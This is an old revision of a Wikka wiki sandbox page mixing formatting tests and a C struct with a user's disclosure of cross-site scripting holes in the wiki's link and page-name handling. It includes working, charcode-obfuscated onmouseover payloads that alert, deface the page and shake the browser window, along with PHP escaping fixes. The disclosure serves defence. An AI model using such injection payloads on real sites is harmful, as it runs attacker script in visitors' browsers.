Revision [13528]

This is an old revision of SandBox made by 84.9.84.235 on 2006-03-17 09:59:10.

 

Test your formatting skills here


See also:

Note: this server is configured to use a western charset encoding (ISO-8859-1). This results in non-western characters being stored as unicode entities and displayed as such in the edit screen. To learn more on different charset support, please refer to WikkaLocalization.
Read this first
You are free to play with Wikka's FormattingRules syntax on this page. Double click anywhere to open the edit screen.
Please do not remove the main header and this paragraph while editing the page and start editing under the horizontal rule BELOW
 



yeah
Please make sure that the server has write access to a folder named uploads.


hello test
www.google.de google
WikiPedia

Testing

Dieses Leben ist eins der besten. Aber wie sind die anderen?

Testing

Testing


<include iostream>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include "glm.h"


/*
 * One cell record. The page gives no description of the fields; the notes
 * below state only what the declarations show.
 * NOTE(review): the tag name _cell starts with an underscore, which C reserves
 * at file scope; a plain tag name would avoid that.
 */
typedef struct _cell {
    int id;             /* integer identifier */
    int x, y;           /* integer pair, presumably a position - confirm */
    float min, max;     /* presumably the bounds for value - confirm */
    float value;
    float step;         /* presumably the increment applied to value - confirm */
    char* info;         /* string pointer; ownership not shown here */
    /* NOTE(review): if format is handed to a printf-family call, it must never
       come from untrusted input - confirm how it is used. */
    char* format;
} cell;

http://www.qwerty.com
HomePage
mailtop:testmail@nowhere.com

"onmouseover="alert(String.fromCharCode(73,32,99,97,110,32,114,117,110,32,74,97,118,97,83,99,114,105,112,116,44,32,97,32,98,97,100,32,116,104,105,110,103))" move your mouse over this. To disallow this insert the following line into /formatters/wakka.php after line 251:
// Escape HTML special characters in $url before the formatter emits it, so a
// double quote in the link text can no longer end the attribute value early.
// NOTE(review): presumably $url ends up inside a double-quoted href - confirm
// against /formatters/wakka.php. On PHP versions before 8.1 the default flags
// leave single quotes unescaped; pass ENT_QUOTES if the attribute may be
// single-quoted.
// NOTE(review): escaping does not check the URL scheme; verify that is handled
// separately.
$url = htmlspecialchars($url);

For info contact me at sakaru [at] gmail [dot] com

www.yahoo.com.br yahoo sandbox

Note how the injected script has access to anything on the page... sakaru made a good point here! Mouse over the "Interesting" link below.
"id="q" Hello
"onmouseover="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,113,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,70,79,78,84,32,83,84,89,76,69,61,92,34,102,111,110,116,58,110,111,114,109,97,108,32,110,111,114,109,97,108,32,98,111,108,100,32,49,50,56,112,120,32,65,114,105,97,108,59,116,101,120,116,45,100,101,99,111,114,97,116,105,111,110,58,98,108,105,110,107,59,92,34,62,33,33,68,65,78,71,69,82,33,33,60,47,70,79,78,84,62,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,68,73,86,34,41,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,108,97,115,116,67,104,105,108,100,46,105,110,110,101,114,72,84,77,76,61,34,60,70,79,78,84,32,83,84,89,76,69,61,92,34,102,111,110,116,58,110,111,114,109,97,108,32,110,111,114,109,97,108,32,98,111,108,100,32,49,50,56,112,120,32,65,114,105,97,108,59,116,101,120,116,45,100,101,99,111,114,97,116,105,111,110,58,98,108,105,110,107,59,92,34,62,72,79,79,87,69,69,33,33,60,47,70,79,78,84,62,34))" Interesting
"onmouseover="eval(String.fromCharCode(119,105,110,100,111,119,46,115,104,97,107,101,61,110,101,119,32,102,117,110,99,116,105,111,110,40,41,123,119,105,110,100,111,119,46,109,111,118,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,114,101,115,105,122,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,115,99,114,111,108,108,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,115,101,116,84,105,109,101,111,117,116,40,34,119,105,110,100,111,119,46,115,104,97,107,101,34,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,49,48,48,41,41,59,125,59,119,105,110,100,111,119,46,115,104,97,107,101,59))" Shake
"id="w"title="119,105,110,100,111,119,46,109,111,118,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,114,101,115,105,122,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,115,99,114,111,108,108,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,115,101,116,84,105,109,101,111,117,116,40,34,101,118,97,108,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,92,34,119,92,34,41,46,116,105,116,108,101,41,34,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,49,48,48,41,41,59" Hello
"onmouseover="eval(String.fromCharCode(101,118,97,108,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,119,34,41,46,116,105,116,108,101,41,41))" Testing

Another bug (which as far as I know isn't a security hole like the previous example) is shown here
This can be fixed by entering the following line after line 989 in /wikka.php
// Convert every character in $tag that has an HTML entity to that entity, so
// markup in the value is displayed as text instead of being parsed.
// NOTE(review): $tag looks like the page name taken from the request (the
// wikipage/Index/<xmp> case on this page) - confirm against /wikka.php.
$tag = htmlentities($tag);

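This can't be used to run JS because the / in the closing tag gets escaped. (That only rules out markup that needs a closing tag; since the tag name is still echoed unescaped, it is safer to treat this as HTML injection and apply the escaping above regardless.)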

Similarly, wikipage/Index/<xmp> also displays the bug, but I haven't yet found where to insert the code that prevents this. If I find it I'll post back.